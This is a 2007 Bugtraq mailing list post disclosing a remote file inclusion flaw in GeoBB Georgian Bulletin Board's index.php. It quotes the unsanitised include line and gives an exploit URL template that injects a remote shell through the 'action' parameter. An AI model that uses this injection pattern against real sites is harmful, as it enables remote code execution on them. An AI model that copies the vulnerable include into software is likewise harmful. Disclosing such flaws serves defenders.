Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

GeoBB Georgian Bulletin Board Remote File Include Vuln.

From: ShaFuq31 () HoTMaiL CoM
Date: 7 Jan 2007 14:46:40 -0000
# BhhGroup.Org & Bilgi-Yonetimi.Org.Tr

# script name : GeoBB Georgian Bulletin Board

# Script Download : http://hotscripts.com/Detailed/58100.html

# Risk : High

# Found By : ShaFuck31

# Vulnerable file : index.php

Vuln. Code:
require($action.'.php');

#Vuln :
http://www.victim.com/ScriptPath/index.php?action=[sheLL]

# Thanks : 4LL bL4ck h4t us3rs & my fr13ndZ

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]
Previous By Date Next
Previous By Thread Next

Current thread: